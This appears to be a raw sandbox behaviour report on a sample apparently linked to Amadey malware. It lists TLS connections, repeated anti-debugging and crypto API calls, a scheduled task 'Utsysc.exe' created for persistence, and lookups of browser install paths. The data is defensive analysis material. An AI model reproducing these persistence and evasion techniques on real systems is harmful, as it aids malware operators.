172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49308
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49310
18.64.8.109:443
C=US, O=Amazon, CN=Amazon RSA 2048 M03 CN=unrealengine.com ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1
192.168.56.101:49285
104.76.78.101:443
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1
192.168.56.101:49304
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49319
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49307
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49327
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49320
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49321
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49338
142.250.207.46:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.google.com fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1
192.168.56.101:49339
142.250.207.46:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.google.com fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f
TLSv1
192.168.56.101:49341
142.250.206.205:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com 16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1
192.168.56.101:49347
142.250.207.99:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1
192.168.56.101:49349
142.250.207.99:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1
192.168.56.101:49275
142.250.206.205:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com 16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1
192.168.56.101:49299
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49312
18.64.8.109:443
C=US, O=Amazon, CN=Amazon RSA 2048 M03 CN=unrealengine.com ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1
192.168.56.101:49325
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49340
142.250.206.205:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com 16:5a:f1:76:25:96:2a:7f:80:a7:89:81:ce:d5:f4:5f:3d:29:9c:93
TLSv1
192.168.56.101:49351
142.250.207.46:443
None None None
TLSv1
192.168.56.101:49352
142.250.207.46:443
None None None
TLSv1
192.168.56.101:49354
142.250.76.132:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=www.google.com f5:cc:da:b5:ba:1e:14:14:44:cc:27:90:92:cc:60:1f:5f:08:af:77
TLSv1
192.168.56.101:49298
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49303
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49311
18.64.8.109:443
C=US, O=Amazon, CN=Amazon RSA 2048 M03 CN=unrealengine.com ea:72:01:d4:ef:e9:b1:f1:59:58:8b:4d:c0:ea:57:c2:c6:28:7b:bf
TLSv1
192.168.56.101:49316
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49344
142.251.222.42:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9
TLSv1
192.168.56.101:49348
142.250.207.99:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1
192.168.56.101:49350
142.250.207.99:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1
192.168.56.101:49296
54.175.89.124:443
C=US, O=Amazon, CN=Amazon RSA 2048 M02 CN=epicgames.com 21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1
192.168.56.101:49302
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49324
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49328
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49326
172.64.145.151:443
None None None
TLSv1
192.168.56.101:49335
104.76.78.101:443
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1
192.168.56.101:49336
104.76.78.101:443
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1
192.168.56.101:49345
142.251.222.42:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com fa:d7:68:e4:12:7d:fe:22:87:de:95:f1:1e:49:5a:49:fa:12:1e:b9
TLSv1
192.168.56.101:49346
142.250.207.99:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com eb:59:e9:f3:0f:ce:d8:1a:8c:bb:ee:7d:2e:b7:b8:39:73:7a:ce:28
TLSv1
192.168.56.101:49353
142.250.76.132:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=www.google.com f5:cc:da:b5:ba:1e:14:14:44:cc:27:90:92:cc:60:1f:5f:08:af:77

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627b48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627b48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627a48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627a48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627a48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627a48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627a48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627ac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00627cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00628588
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00628588
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00628448
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00618b70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00618b70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00618bf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00619170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006191b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006191b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006192f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006192f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00619230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00619070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00619070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00619070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0076bd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0076bd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0076bec8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005097a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005097a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005096a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005096a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005096a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005096a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005096a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509720
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00509920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x22cbf0d
0x22cbcde
0x22c6cad
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x22cc048
registers.esp: 33484932
registers.edi: 33484984
registers.eax: 0
registers.ebp: 33484996
registers.edx: 6314384
registers.ebx: 33486212
registers.esi: 38346860
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd2906
0x7fd27c9
0x7fd26e5
0x7fd17e0
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483284
registers.edi: 33483532
registers.eax: 0
registers.ebp: 33483544
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 40381900
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd2d18
0x7fd27c9
0x7fd26e5
0x7fd17e0
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483520
registers.edi: 33483804
registers.eax: 0
registers.ebp: 33483528
registers.edx: 0
registers.ebx: 33486212
registers.esi: 40381900
registers.ecx: 37952456
1 0 0

__exception__

stacktrace:
0x7fd2906
0x7fd27c9
0x7fd26fd
0x7fd17e0
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
